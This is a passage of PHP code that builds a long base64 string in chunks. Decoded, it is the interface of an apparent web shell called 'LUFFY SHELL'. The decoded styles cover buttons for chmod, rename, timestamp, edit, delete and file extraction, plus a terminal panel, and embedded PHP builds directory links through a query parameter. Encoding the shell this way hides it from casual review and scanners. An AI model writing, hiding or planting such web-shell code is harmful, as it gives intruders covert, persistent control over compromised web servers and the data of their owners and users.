$z .= "AgICAgdXJsKCdodHRwczovL2kuaWJi";
$z .= "LmNvL0d2Nzd5VkhQL1VudGl0bGVkLT";
$z .= "IuanBnJykgbm8tcmVwZWF0IGNlbnRl";
$z .= "ciBjZW50ZXIgZml4ZWQ7DQogICAgIC";
$z .= "AgICAgICBiYWNrZ3JvdW5kLXNpemU6";
$z .= "IGNvdmVyOw0KICAgICAgICAgICAgY2";
$z .= "9sb3I6IHZhcigtLXRleHQtcHJpbWFy";
$z .= "eSk7DQogICAgICAgICAgICBwYWRkaW";
$z .= "5nOiAyMHB4Ow0KICAgICAgICAgICAg";
$z .= "bWluLWhlaWdodDogMTAwdmg7DQogIC";
$z .= "AgICAgIH0NCiAgICAgICAgDQogICAg";
$z .= "ICAgIC5jb250YWluZXIgew0KICAgIC";
$z .= "AgICAgICAgbWF4LXdpZHRoOiAxNDAw";
$z .= "cHg7DQogICAgICAgICAgICBtYXJnaW";
$z .= "46IDAgYXV0bzsNCiAgICAgICAgfQ0K";
$z .= "ICAgICAgICANCiAgICAgICAgLmhlYW";
$z .= "RlciB7DQogICAgICAgICAgICB0ZXh0";
$z .= "LWFsaWduOiBjZW50ZXI7DQogICAgIC";
$z .= "AgICAgICBwYWRkaW5nOiAxNXB4Ow0K";
$z .= "ICAgICAgICAgICAgYmFja2dyb3VuZD";
$z .= "ogdmFyKC0tYmctY2FyZCk7DQogICAg";
$z .= "ICAgICAgICBib3JkZXItcmFkaXVzOi";
$z .= "A4cHg7DQogICAgICAgICAgICBtYXJn";
$z .= "aW4tYm90dG9tOiAxMHB4Ow0KICAgIC";
$z .= "AgICAgICAgYm9yZGVyOiAycHggc29s";
$z .= "aWQgdmFyKC0tYWNjZW50LWdvbGQpOw";
$z .= "0KICAgICAgICAgICAgYm94LXNoYWRv";
$z .= "dzogMCAwIDIwcHggcmdiYSgyNTUsID";
$z .= "IxNSwgMCwgMC4yKTsNCiAgICAgICAg";
$z .= "fQ0KICAgICAgICANCiAgICAgICAgLm";
$z .= "JyZWFkY3J1bWIgew0KICAgICAgICAg";
$z .= "ICAgYmFja2dyb3VuZDogdmFyKC0tYm";
$z .= "ctY2FyZCk7DQogICAgICAgICAgICBw";
$z .= "YWRkaW5nOiA4cHggMTJweDsNCiAgIC";
$z .= "AgICAgICAgIGJvcmRlci1yYWRpdXM6";
$z .= "IDVweDsNCiAgICAgICAgICAgIG1hcm";
$z .= "dpbi1ib3R0b206IDEwcHg7DQogICAg";
$z .= "ICAgICAgICBmb250LXNpemU6IDEzcH";
$z .= "g7DQogICAgICAgICAgICBib3JkZXI6";
$z .= "IDFweCBzb2xpZCB2YXIoLS1ib3JkZX";
$z .= "ItY29sb3IpOw0KICAgICAgICB9DQog";
$z .= "ICAgICAgIA0KICAgICAgICAuZm9ybS";
$z .= "1ncmlkIHsNCiAgICAgICAgICAgIGRp";
$z .= "c3BsYXk6IGZsZXg7DQogICAgICAgIC";
$z .= "AgICBmbGV4LXdyYXA6IHdyYXA7DQog";
$z .= "ICAgICAgICAgICBnYXA6IDEwcHg7DQ";
$z .= "ogICAgICAgICAgICBtYXJnaW4tYm90";
$z .= "dG9tOiAxNXB4Ow0KICAgICAgICB9DQ";
$z .= "ogICAgICAgIA0KICAgICAgICAuZm9y";
$z .= "bS1ib3ggew0KICAgICAgICAgICAgYm";
$z .= "Fja2dyb3VuZDogdmFyKC0tYmctY2Fy";
$z .= "ZCk7DQogICAgICAgICAgICBwYWRkaW";
$z .= "5nOiAxMnB4Ow0KICAgICAgICAgICAg";
$z .= "Ym9yZGVyLXJhZGl1czogNXB4Ow0KIC";
$z .= "AgICAgICAgICAgYm9yZGVyOiAxcHgg";
$z .= "c29saWQgdmFyKC0tYm9yZGVyLWNvbG";
$z .= "9yKTsNCiAgICAgICAgICAgIGZsZXg6";
$z .= "IDE7DQogICAgICAgICAgICBtaW4td2";
$z .= "lkdGg6IDI1MHB4Ow0KICAgICAgICB9";
$z .= "DQogICAgICAgIA0KICAgICAgICAuZm";
$z .= "9ybS1ib3ggaDMgew0KICAgICAgICAg";
$z .= "ICAgbWFyZ2luLXRvcDogMDsNCiAgIC";
$z .= "AgICAgICAgIG1hcmdpbi1ib3R0b206";
$z .= "IDhweDsNCiAgICAgICAgICAgIGZvbn";
$z .= "Qtc2l6ZTogMTNweDsNCiAgICAgICAg";
$z .= "ICAgIGNvbG9yOiB2YXIoLS1hY2Nlbn";
$z .= "QtZ29sZCk7DQogICAgICAgIH0NCiAg";
$z .= "ICAgICAgDQogICAgICAgIC5mb3JtLW";
$z .= "JveCBpbnB1dCwNCiAgICAgICAgLmZv";
$z .= "cm0tYm94IHNlbGVjdCwNCiAgICAgIC";
$z .= "AgLmZvcm0tYm94IHRleHRhcmVhIHsN";
$z .= "CiAgICAgICAgICAgIHdpZHRoOiAxMD";
$z .= "AlOw0KICAgICAgICAgICAgcGFkZGlu";
$z .= "ZzogNnB4Ow0KICAgICAgICAgICAgbW";
$z .= "FyZ2luLWJvdHRvbTogNnB4Ow0KICAg";
$z .= "ICAgICAgICAgYmFja2dyb3VuZDogcm";
$z .= "diYSgyMCwgMjAsIDIwLCAwLjkpOw0K";
$z .= "ICAgICAgICAgICAgY29sb3I6IHZhci";
$z .= "gtLXRleHQtcHJpbWFyeSk7DQogICAg";
$z .= "ICAgICAgICBib3JkZXI6IDFweCBzb2";
$z .= "xpZCByZ2JhKDI1NSwgMjE1LCAwLCAw";
$z .= "LjIpOw0KICAgICAgICAgICAgYm9yZG";
$z .= "VyLXJhZGl1czogM3B4Ow0KICAgICAg";
$z .= "ICAgICAgZm9udC1zaXplOiAxMnB4Ow";
$z .= "0KICAgICAgICAgICAgZm9udC1mYW1p";
$z .= "bHk6ICdDb3VyaWVyIE5ldycsIG1vbm";
$z .= "9zcGFjZTsNCiAgICAgICAgfQ0KICAg";
$z .= "ICAgICANCiAgICAgICAgLmZvcm0tYm";
$z .= "94IGJ1dHRvbiB7DQogICAgICAgICAg";
$z .= "ICB3aWR0aDogMTAwJTsNCiAgICAgIC";
$z .= "AgICAgIHBhZGRpbmc6IDhweDsNCiAg";
$z .= "ICAgICAgICAgIGJhY2tncm91bmQ6IG";
$z .= "xpbmVhci1ncmFkaWVudCgxMzVkZWcs";
$z .= "IHZhcigtLWFjY2VudC1nb2xkKSwgI0";
$z .= "I4ODYwQik7DQogICAgICAgICAgICBj";
$z .= "b2xvcjogIzAwMDsNCiAgICAgICAgIC";
$z .= "AgIGJvcmRlcjogbm9uZTsNCiAgICAg";
$z .= "ICAgICAgIGJvcmRlci1yYWRpdXM6ID";
$z .= "NweDsNCiAgICAgICAgICAgIGN1cnNv";
$z .= "cjogcG9pbnRlcjsNCiAgICAgICAgIC";
$z .= "AgIGZvbnQtd2VpZ2h0OiBib2xkOw0K";
$z .= "ICAgICAgICAgICAgZm9udC1zaXplOi";
$z .= "AxMnB4Ow0KICAgICAgICB9DQogICAg";
$z .= "ICAgIA0KICAgICAgICAuZm9ybS1ib3";
$z .= "ggYnV0dG9uOmhvdmVyIHsNCiAgICAg";
$z .= "ICAgICAgIGJhY2tncm91bmQ6IGxpbm";
$z .= "Vhci1ncmFkaWVudCgxMzVkZWcsICNC";
$z .= "ODg2MEIsIHZhcigtLWFjY2VudC1nb2";
$z .= "xkKSk7DQogICAgICAgIH0NCiAgICAg";
$z .= "ICAgDQogICAgICAgIC5idG4gew0KIC";
$z .= "AgICAgICAgICAgcGFkZGluZzogNnB4";
$z .= "IDEycHg7DQogICAgICAgICAgICBiYW";
$z .= "NrZ3JvdW5kOiBsaW5lYXItZ3JhZGll";
$z .= "bnQoMTM1ZGVnLCB2YXIoLS1hY2Nlbn";
$z .= "QtZ29sZCksICNCODg2MEIpOw0KICAg";
$z .= "ICAgICAgICAgY29sb3I6ICMwMDA7DQ";
$z .= "ogICAgICAgICAgICBib3JkZXI6IG5v";
$z .= "bmU7DQogICAgICAgICAgICBib3JkZX";
$z .= "ItcmFkaXVzOiAzcHg7DQogICAgICAg";
$z .= "ICAgICB0ZXh0LWRlY29yYXRpb246IG";
$z .= "5vbmU7DQogICAgICAgICAgICBjdXJz";
$z .= "b3I6IHBvaW50ZXI7DQogICAgICAgIC";
$z .= "AgICBmb250LXdlaWdodDogYm9sZDsN";
$z .= "CiAgICAgICAgICAgIHRyYW5zaXRpb2";
$z .= "46IGFsbCAwLjNzOw0KICAgICAgICAg";
$z .= "ICAgZGlzcGxheTogaW5saW5lLWJsb2";
$z .= "NrOw0KICAgICAgICAgICAgZm9udC1z";
$z .= "aXplOiAxMnB4Ow0KICAgICAgICB9DQ";
$z .= "ogICAgICAgIA0KICAgICAgICAuYnRu";
$z .= "OmhvdmVyIHsNCiAgICAgICAgICAgIH";
$z .= "RyYW5zZm9ybTogdHJhbnNsYXRlWSgt";
$z .= "MXB4KTsNCiAgICAgICAgICAgIGJveC";
$z .= "1zaGFkb3c6IDAgM3B4IDEwcHggcmdi";
$z .= "YSgyNTUsIDIxNSwgMCwgMC4yKTsNCi";
$z .= "AgICAgICAgfQ0KICAgICAgICANCiAg";
$z .= "ICAgICAgLmJ0bi1jaG1vZCB7DQogIC";
$z .= "AgICAgICAgICBiYWNrZ3JvdW5kOiBs";
$z .= "aW5lYXItZ3JhZGllbnQoMTM1ZGVnLC";
$z .= "AjMDBCRkZGLCAjMUU5MEZGKTsNCiAg";
$z .= "ICAgICAgICAgIGNvbG9yOiB3aGl0ZT";
$z .= "sNCiAgICAgICAgfQ0KICAgICAgICAN";
$z .= "CiAgICAgICAgLmJ0bi1yZW5hbWUgew";
$z .= "0KICAgICAgICAgICAgYmFja2dyb3Vu";
$z .= "ZDogbGluZWFyLWdyYWRpZW50KDEzNW";
$z .= "RlZywgIzAwZmZmZiwgIzIwQjJBQSk7";
$z .= "DQogICAgICAgICAgICBjb2xvcjogIz";
$z .= "AwMDsNCiAgICAgICAgfQ0KICAgICAg";
$z .= "ICANCiAgICAgICAgLmJ0bi10aW1lc3";
$z .= "RhbXAgew0KICAgICAgICAgICAgYmFj";
$z .= "a2dyb3VuZDogbGluZWFyLWdyYWRpZW";
$z .= "50KDEzNWRlZywgI0ZGMDBGRiwgIzhC";
$z .= "MDA4Qik7DQogICAgICAgICAgICBjb2";
$z .= "xvcjogd2hpdGU7DQogICAgICAgIH0N";
$z .= "CiAgICAgICAgDQogICAgICAgIC5idG";
$z .= "4tZWRpdCB7DQogICAgICAgICAgICBi";
$z .= "YWNrZ3JvdW5kOiBsaW5lYXItZ3JhZG";
$z .= "llbnQoMTM1ZGVnLCAjMDBmZjAwLCAj";
$z .= "MzJDRDMyKTsNCiAgICAgICAgICAgIG";
$z .= "NvbG9yOiAjMDAwOw0KICAgICAgICB9";
$z .= "DQogICAgICAgIA0KICAgICAgICAuYn";
$z .= "RuLWRlbGV0ZSB7DQogICAgICAgICAg";
$z .= "ICBiYWNrZ3JvdW5kOiBsaW5lYXItZ3";
$z .= "JhZGllbnQoMTM1ZGVnLCAjZmYxNDE0";
$z .= "LCAjOEIwMDAwKTsNCiAgICAgICAgIC";
$z .= "AgIGNvbG9yOiB3aGl0ZTsNCiAgICAg";
$z .= "ICAgfQ0KICAgICAgICANCiAgICAgIC";
$z .= "AgLmJ0bi1leHRyYWN0IHsNCiAgICAg";
$z .= "ICAgICAgIGJhY2tncm91bmQ6IGxpbm";
$z .= "Vhci1ncmFkaWVudCgxMzVkZWcsICNG";
$z .= "RkE1MDAsICNGRjhDMDApOw0KICAgIC";
$z .= "AgICAgICAgY29sb3I6ICMwMDA7DQog";
$z .= "ICAgICAgIH0NCiAgICAgICAgDQogIC";
$z .= "AgICAgIC5maWxlLXRhYmxlIHsNCiAg";
$z .= "ICAgICAgICAgIHdpZHRoOiAxMDAlOw";
$z .= "0KICAgICAgICAgICAgYmFja2dyb3Vu";
$z .= "ZDogdmFyKC0tYmctY2FyZCk7DQogIC";
$z .= "AgICAgICAgICBib3JkZXItY29sbGFw";
$z .= "c2U6IGNvbGxhcHNlOw0KICAgICAgIC";
$z .= "AgICAgbWFyZ2luLWJvdHRvbTogMjBw";
$z .= "eDsNCiAgICAgICAgICAgIGZvbnQtc2";
$z .= "l6ZTogMTJweDsNCiAgICAgICAgICAg";
$z .= "IGJvcmRlcjogMXB4IHNvbGlkIHZhci";
$z .= "gtLWJvcmRlci1jb2xvcik7DQogICAg";
$z .= "ICAgICAgICBib3JkZXItcmFkaXVzOi";
$z .= "A2cHg7DQogICAgICAgICAgICBvdmVy";
$z .= "ZmxvdzogaGlkZGVuOw0KICAgICAgIC";
$z .= "B9DQogICAgICAgIA0KICAgICAgICAu";
$z .= "ZmlsZS10YWJsZSB0aCB7DQogICAgIC";
$z .= "AgICAgICBiYWNrZ3JvdW5kOiByZ2Jh";
$z .= "KDMwLCAzMCwgMzAsIDAuOSk7DQogIC";
$z .= "AgICAgICAgICBwYWRkaW5nOiAxMHB4";
$z .= "Ow0KICAgICAgICAgICAgdGV4dC1hbG";
$z .= "lnbjogbGVmdDsNCiAgICAgICAgICAg";
$z .= "IGNvbG9yOiB2YXIoLS1hY2NlbnQtZ2";
$z .= "9sZCk7DQogICAgICAgICAgICBib3Jk";
$z .= "ZXItYm90dG9tOiAycHggc29saWQgdm";
$z .= "FyKC0tYWNjZW50LWdvbGQpOw0KICAg";
$z .= "ICAgICAgICAgZm9udC1zaXplOiAxM3";
$z .= "B4Ow0KICAgICAgICB9DQogICAgICAg";
$z .= "IA0KICAgICAgICAuZmlsZS10YWJsZS";
$z .= "B0ZCB7DQogICAgICAgICAgICBwYWRk";
$z .= "aW5nOiA4cHg7DQogICAgICAgICAgIC";
$z .= "Bib3JkZXItYm90dG9tOiAxcHggc29s";
$z .= "aWQgcmdiYSgyNTUsMjU1LDI1NSwwLj";
$z .= "EpOw0KICAgICAgICAgICAgY29sb3I6";
$z .= "IHZhcigtLXRleHQtc2Vjb25kYXJ5KT";
$z .= "sNCiAgICAgICAgICAgIGZvbnQtc2l6";
$z .= "ZTogMTJweDsNCiAgICAgICAgfQ0KIC";
$z .= "AgICAgICANCiAgICAgICAgLmZpbGUt";
$z .= "dGFibGUgdHI6aG92ZXIgew0KICAgIC";
$z .= "AgICAgICAgYmFja2dyb3VuZDogcmdi";
$z .= "YSgyNTUsIDIxNSwgMCwgMC4wOCk7DQ";
$z .= "ogICAgICAgIH0NCiAgICAgICAgDQog";
$z .= "ICAgICAgIC5wZXJtLWxlZ2VuZC1ib3";
$z .= "ggew0KICAgICAgICAgICAgYmFja2dy";
$z .= "b3VuZDogcmdiYSgwLCAwLCAwLCAwLj";
$z .= "gpOw0KICAgICAgICAgICAgcGFkZGlu";
$z .= "ZzogMTVweDsNCiAgICAgICAgICAgIG";
$z .= "JvcmRlci1yYWRpdXM6IDhweDsNCiAg";
$z .= "ICAgICAgICAgIG1hcmdpbjogMTVweC";
$z .= "AwOw0KICAgICAgICAgICAgYm9yZGVy";
$z .= "OiAycHggc29saWQgdmFyKC0tYWNjZW";
$z .= "50LWdvbGQpOw0KICAgICAgICAgICAg";
$z .= "Zm9udC1zaXplOiAxMnB4Ow0KICAgIC";
$z .= "AgICB9DQogICAgICAgIA0KICAgICAg";
$z .= "ICAucGVybS1sZWdlbmQtaGVhZGVyIH";
$z .= "sNCiAgICAgICAgICAgIGRpc3BsYXk6";
$z .= "IGZsZXg7DQogICAgICAgICAgICBhbG";
$z .= "lnbi1pdGVtczogY2VudGVyOw0KICAg";
$z .= "ICAgICAgICAgbWFyZ2luLWJvdHRvbT";
$z .= "ogMTJweDsNCiAgICAgICAgICAgIHBh";
$z .= "ZGRpbmctYm90dG9tOiA4cHg7DQogIC";
$z .= "AgICAgICAgICBib3JkZXItYm90dG9t";
$z .= "OiAxcHggc29saWQgcmdiYSgyNTUsID";
$z .= "IxNSwgMCwgMC4zKTsNCiAgICAgICAg";
$z .= "fQ0KICAgICAgICANCiAgICAgICAgLn";
$z .= "Blcm0tbGVnZW5kLWhlYWRlciBoMyB7";
$z .= "DQogICAgICAgICAgICBtYXJnaW46ID";
$z .= "A7DQogICAgICAgICAgICBmb250LXNp";
$z .= "emU6IDE0cHg7DQogICAgICAgICAgIC";
$z .= "Bjb2xvcjogdmFyKC0tYWNjZW50LWdv";
$z .= "bGQpOw0KICAgICAgICB9DQogICAgIC";
$z .= "AgIA0KICAgICAgICAucGVybS1sZWdl";
$z .= "bmQtZ3JpZCB7DQogICAgICAgICAgIC";
$z .= "BkaXNwbGF5OiBncmlkOw0KICAgICAg";
$z .= "ICAgICAgZ3JpZC10ZW1wbGF0ZS1jb2";
$z .= "x1bW5zOiByZXBlYXQoYXV0by1maWxs";
$z .= "LCBtaW5tYXgoMjAwcHgsIDFmcikpOw";
$z .= "0KICAgICAgICAgICAgZ2FwOiAxMHB4";
$z .= "Ow0KICAgICAgICAgICAgbWFyZ2luLX";
$z .= "RvcDogMTBweDsNCiAgICAgICAgfQ0K";
$z .= "ICAgICAgICANCiAgICAgICAgLnBlcm";
$z .= "0tbGVnZW5kLWl0ZW0gew0KICAgICAg";
$z .= "ICAgICAgZGlzcGxheTogZmxleDsNCi";
$z .= "AgICAgICAgICAgIGFsaWduLWl0ZW1z";
$z .= "OiBjZW50ZXI7DQogICAgICAgICAgIC";
$z .= "BwYWRkaW5nOiA4cHg7DQogICAgICAg";
$z .= "ICAgICBiYWNrZ3JvdW5kOiByZ2JhKD";
$z .= "IwLCAyMCwgMjAsIDAuNyk7DQogICAg";
$z .= "ICAgICAgICBib3JkZXItcmFkaXVzOi";
$z .= "A1cHg7DQogICAgICAgICAgICBib3Jk";
$z .= "ZXI6IDFweCBzb2xpZCByZ2JhKDI1NS";
$z .= "wgMjU1LCAyNTUsIDAuMSk7DQogICAg";
$z .= "ICAgIH0NCiAgICAgICAgDQogICAgIC";
$z .= "AgIC5wZXJtLWNvbG9yLWJveCB7DQog";
$z .= "ICAgICAgICAgICB3aWR0aDogMjBweD";
$z .= "sNCiAgICAgICAgICAgIGhlaWdodDog";
$z .= "MjBweDsNCiAgICAgICAgICAgIGJvcm";
$z .= "Rlci1yYWRpdXM6IDRweDsNCiAgICAg";
$z .= "ICAgICAgIG1hcmdpbi1yaWdodDogMT";
$z .= "BweDsNCiAgICAgICAgICAgIGJvcmRl";
$z .= "cjogMnB4IHNvbGlkIHJnYmEoMjU1LC";
$z .= "AyNTUsIDI1NSwgMC4yKTsNCiAgICAg";
$z .= "ICAgfQ0KICAgICAgICANCiAgICAgIC";
$z .= "AgLnBlcm0tY29sb3ItZ3JlZW4gew0K";
$z .= "ICAgICAgICAgICAgYmFja2dyb3VuZD";
$z .= "ogIzAwZmYwMDsNCiAgICAgICAgfQ0K";
$z .= "ICAgICAgICANCiAgICAgICAgLnBlcm";
$z .= "0tY29sb3Itd2hpdGUgew0KICAgICAg";
$z .= "ICAgICAgYmFja2dyb3VuZDogI2ZmZm";
$z .= "ZmZjsNCiAgICAgICAgfQ0KICAgICAg";
$z .= "ICANCiAgICAgICAgLnBlcm0taW5mby";
$z .= "B7DQogICAgICAgICAgICBmbGV4OiAx";
$z .= "Ow0KICAgICAgICB9DQogICAgICAgIA";
$z .= "0KICAgICAgICAucGVybS1uYW1lIHsN";
$z .= "CiAgICAgICAgICAgIGZvbnQtd2VpZ2";
$z .= "h0OiBib2xkOw0KICAgICAgICAgICAg";
$z .= "Zm9udC1zaXplOiAxMnB4Ow0KICAgIC";
$z .= "AgICAgICAgY29sb3I6IHZhcigtLXRl";
$z .= "eHQtcHJpbWFyeSk7DQogICAgICAgIH";
$z .= "0NCiAgICAgICAgDQogICAgICAgIC5w";
$z .= "ZXJtLWRlc2Mgew0KICAgICAgICAgIC";
$z .= "AgZm9udC1zaXplOiAxMHB4Ow0KICAg";
$z .= "ICAgICAgICAgY29sb3I6ICNhYWE7DQ";
$z .= "ogICAgICAgICAgICBtYXJnaW4tdG9w";
$z .= "OiAycHg7DQogICAgICAgIH0NCiAgIC";
$z .= "AgICAgDQogICAgICAgIC50ZXJtaW5h";
$z .= "bCB7DQogICAgICAgICAgICBiYWNrZ3";
$z .= "JvdW5kOiAjMDAwOw0KICAgICAgICAg";
$z .= "ICAgY29sb3I6IHZhcigtLXRleHQtcH";
$z .= "JpbWFyeSk7DQogICAgICAgICAgICBw";
$z .= "YWRkaW5nOiAxNXB4Ow0KICAgICAgIC";
$z .= "AgICAgYm9yZGVyLXJhZGl1czogNXB4";
$z .= "Ow0KICAgICAgICAgICAgbWFyZ2luLX";
$z .= "RvcDogMjBweDsNCiAgICAgICAgICAg";
$z .= "IGJvcmRlcjogMXB4IHNvbGlkIHZhci";
$z .= "gtLWFjY2VudC1nb2xkKTsNCiAgICAg";
$z .= "ICAgICAgIGZvbnQtZmFtaWx5OiAnQ2";
$z .= "91cmllciBOZXcnLCBtb25vc3BhY2U7";
$z .= "DQogICAgICAgICAgICBmb250LXNpem";
$z .= "U6IDEycHg7DQogICAgICAgIH0NCiAg";
$z .= "ICAgICAgDQogICAgICAgIC50ZXJtaW";
$z .= "5hbCBwcmUgew0KICAgICAgICAgICAg";
$z .= "d2hpdGUtc3BhY2U6IHByZS13cmFwOw";
$z .= "0KICAgICAgICAgICAgd29yZC1icmVh";
$z .= "azogYnJlYWstYWxsOw0KICAgICAgIC";
$z .= "AgICAgbWF4LWhlaWdodDogMzAwcHg7";
$z .= "DQogICAgICAgICAgICBvdmVyZmxvdy";
$z .= "15OiBhdXRvOw0KICAgICAgICAgICAg";
$z .= "YmFja2dyb3VuZDogIzExMTsNCiAgIC";
$z .= "AgICAgICAgIHBhZGRpbmc6IDEwcHg7";
$z .= "DQogICAgICAgICAgICBib3JkZXItcm";
$z .= "FkaXVzOiAzcHg7DQogICAgICAgICAg";
$z .= "ICBmb250LXNpemU6IDExcHg7DQogIC";
$z .= "AgICAgIH0NCiAgICAgICAgDQogICAg";
$z .= "ICAgIC5mb290ZXIgew0KICAgICAgIC";
$z .= "AgICAgdGV4dC1hbGlnbjogY2VudGVy";
$z .= "Ow0KICAgICAgICAgICAgcGFkZGluZz";
$z .= "ogMTVweDsNCiAgICAgICAgICAgIGNv";
$z .= "bG9yOiAjMzlGRjE0Ow0KICAgICAgIC";
$z .= "AgICAgZm9udC1zaXplOiAxMXB4Ow0K";
$z .= "ICAgICAgICAgICAgbWFyZ2luLXRvcD";
$z .= "ogMjVweDsNCiAgICAgICAgICAgIGJv";
$z .= "cmRlci10b3A6IDFweCBzb2xpZCByZ2";
$z .= "JhKDI1NSwyMTUsMCwwLjIpOw0KICAg";
$z .= "ICAgICB9DQogICAgICAgIA0KICAgIC";
$z .= "AgICAuYWN0aW9uLWJ1dHRvbnMgew0K";
$z .= "ICAgICAgICAgICAgZGlzcGxheTogZm";
$z .= "xleDsNCiAgICAgICAgICAgIGZsZXgt";
$z .= "d3JhcDogd3JhcDsNCiAgICAgICAgIC";
$z .= "AgIGdhcDogNHB4Ow0KICAgICAgICB9";
$z .= "DQogICAgICAgIA0KICAgICAgICAuYW";
$z .= "N0aW9uLWJ1dHRvbnMgLmJ0biB7DQog";
$z .= "ICAgICAgICAgICBwYWRkaW5nOiA0cH";
$z .= "ggOHB4Ow0KICAgICAgICAgICAgZm9u";
$z .= "dC1zaXplOiAxMXB4Ow0KICAgICAgIC";
$z .= "B9DQogICAgICAgIA0KICAgICAgICAu";
$z .= "cGVybS1iYWRnZSB7DQogICAgICAgIC";
$z .= "AgICBmb250LWZhbWlseTogbW9ub3Nw";
$z .= "YWNlOw0KICAgICAgICAgICAgcGFkZG";
$z .= "luZzogM3B4IDZweDsNCiAgICAgICAg";
$z .= "ICAgIGJvcmRlci1yYWRpdXM6IDRweD";
$z .= "sNCiAgICAgICAgICAgIGZvbnQtc2l6";
$z .= "ZTogMTFweDsNCiAgICAgICAgICAgIG";
$z .= "JhY2tncm91bmQ6IHJnYmEoMjU1LDI1";
$z .= "NSwyNTUsMC4xKTsNCiAgICAgICAgIC";
$z .= "AgIGJvcmRlcjogMXB4IHNvbGlkIHJn";
$z .= "YmEoMjU1LCAyNTUsIDI1NSwgMC4yKT";
$z .= "sNCiAgICAgICAgfQ0KICAgICAgICAN";
$z .= "CiAgICAgICAgLmZvbGRlci1uYW1lIH";
$z .= "sNCiAgICAgICAgICAgIGNvbG9yOiAj";
$z .= "MDBmZjAwICFpbXBvcnRhbnQ7DQogIC";
$z .= "AgICAgICAgICBmb250LXdlaWdodDog";
$z .= "Ym9sZDsNCiAgICAgICAgfQ0KICAgIC";
$z .= "AgICANCiAgICAgICAgLmZpbGUtbmFt";
$z .= "ZSB7DQogICAgICAgICAgICBjb2xvcj";
$z .= "ogI2ZmZmZmZiAhaW1wb3J0YW50Ow0K";
$z .= "ICAgICAgICB9DQogICAgICAgIA0KIC";
$z .= "AgICAgICBAbWVkaWEgKG1heC13aWR0";
$z .= "aDogNzY4cHgpIHsNCiAgICAgICAgIC";
$z .= "AgIC5mb3JtLWJveCB7DQogICAgICAg";
$z .= "ICAgICAgICAgbWluLXdpZHRoOiAxMD";
$z .= "AlOw0KICAgICAgICAgICAgfQ0KICAg";
$z .= "ICAgICAgICAgDQogICAgICAgICAgIC";
$z .= "AuZmlsZS10YWJsZSB7DQogICAgICAg";
$z .= "ICAgICAgICAgZm9udC1zaXplOiAxMX";
$z .= "B4Ow0KICAgICAgICAgICAgfQ0KICAg";
$z .= "ICAgICAgICAgDQogICAgICAgICAgIC";
$z .= "AucGVybS1sZWdlbmQtZ3JpZCB7DQog";
$z .= "ICAgICAgICAgICAgICAgZ3JpZC10ZW";
$z .= "1wbGF0ZS1jb2x1bW5zOiAxZnI7DQog";
$z .= "ICAgICAgICAgICB9DQogICAgICAgIC";
$z .= "AgICANCiAgICAgICAgICAgIC5hY3Rp";
$z .= "b24tYnV0dG9ucyB7DQogICAgICAgIC";
$z .= "AgICAgICAgZmxleC1kaXJlY3Rpb246";
$z .= "IGNvbHVtbjsNCiAgICAgICAgICAgIH";
$z .= "0NCiAgICAgICAgfQ0KDQogICAgICAg";
$z .= "IC8qIEluZm8gYmFyIHRhbWJhaGFuIC";
$z .= "ovDQogICAgICAgIC5pbmZvLWJhciB7";
$z .= "DQogICAgICAgICAgICBiYWNrZ3JvdW";
$z .= "5kOiByZ2JhKDAsMCwwLDAuNyk7DQog";
$z .= "ICAgICAgICAgICBwYWRkaW5nOiA4cH";
$z .= "ggMTJweDsNCiAgICAgICAgICAgIG1h";
$z .= "cmdpbjogMTBweCAwOw0KICAgICAgIC";
$z .= "AgICAgYm9yZGVyLWxlZnQ6IDRweCBz";
$z .= "b2xpZCBnb2xkOw0KICAgICAgICAgIC";
$z .= "AgZm9udC1zaXplOiAxMnB4Ow0KICAg";
$z .= "ICAgICAgICAgZGlzcGxheTogZmxleD";
$z .= "sNCiAgICAgICAgICAgIGdhcDogMjBw";
$z .= "eDsNCiAgICAgICAgICAgIGZsZXgtd3";
$z .= "JhcDogd3JhcDsNCiAgICAgICAgICAg";
$z .= "IGJvcmRlci1yYWRpdXM6IDRweDsNCi";
$z .= "AgICAgICAgfQ0KICAgIDwvc3R5bGU+";
$z .= "DQo8L2hlYWQ+DQo8Ym9keT4NCiAgIC";
$z .= "A8ZGl2IGNsYXNzPSJjb250YWluZXIi";
$z .= "Pg0KICAgICAgICA8IS0tIEhFQURFUi";
$z .= "AtLT4NCiAgICAgICAgPGRpdiBjbGFz";
$z .= "cz0iaGVhZGVyIj4NCiAgICAgICAgIC";
$z .= "AgIDxoMSBzdHlsZT0iZm9udC1zaXpl";
$z .= "OiAxOHB4OyBtYXJnaW4tYm90dG9tOi";
$z .= "A1cHg7Ij7wn5qiIExVRkZZIFNIRUxM";
$z .= "IPCfj7TigI3imKDvuI88L2gxPiA8c3";
$z .= "BhbiBzdHlsZT0iY29sb3I6Z29sZDsi";
$z .= "PkJ5IExlZeKcjfCfj7s8L3NwYW4+PC";
$z .= "9oMz4NCiAgICAgICAgICAgIDxwIHN0";
$z .= "eWxlPSJmb250LXNpemU6IDEycHg7Ij";
$z .= "4NCiAgICAgICAgICAgICAgICDiloTv";
$z .= "uLvjg4bilZDilZDilIHkuIDwn5KlOj";
$z .= "ogDQogICAgICAgICAgICAgICAgPD9w";
$z .= "aHANCiAgICAgICAgICAgICAgICAvLy";
$z .= "BNZW1lY2FoIHBhdGggbWVuamFkaSBi";
$z .= "YWdpYW4tYmFnaWFuDQogICAgICAgIC";
$z .= "AgICAgICAgJHBhdGhfcGFydHMgPSBl";
$z .= "eHBsb2RlKCcvJywgdHJpbSgkX19kaX";
$z .= "JfXywgJy8nKSk7DQogICAgICAgICAg";
$z .= "ICAgICAgJGN1cnJlbnRfcGF0aCA9IC";
$z .= "cnOw0KICAgICAgICAgICAgICAgIA0K";
$z .= "ICAgICAgICAgICAgICAgIC8vIFRhbX";
$z .= "BpbGthbiByb290IGxpbmsNCiAgICAg";
$z .= "ICAgICAgICAgICBlY2hvICc8YSBocm";
$z .= "VmPSI/X19kX189LyIgc3R5bGU9ImNv";
$z .= "bG9yOiMwMGZmMDA7IHRleHQtZGVjb3";
$z .= "JhdGlvbjpub25lOyBib3JkZXItYm90";
$z .= "dG9tOjFweCBkYXNoZWQgIzAwZmYwMD";
$z .= "sgY3Vyc29yOnBvaW50ZXI7Ij4vPC9h";
$z .= "Pic7DQogICAgICAgICAgICAgICAgDQ";
$z .= "ogICAgICAgICAgICAgICAgLy8gVGFt";
$z .= "cGlsa2FuIHNldGlhcCBiYWdpYW4gcG";
$z .= "F0aCBzZWJhZ2FpIGxpbmsNCiAgICAg";
$z .= "ICAgICAgICAgICBmb3JlYWNoICgkcG";
$z .= "F0aF9wYXJ0cyBhcyAkaW5kZXggPT4g";
$z .= "JHBhcnQpIHsNCiAgICAgICAgICAgIC";
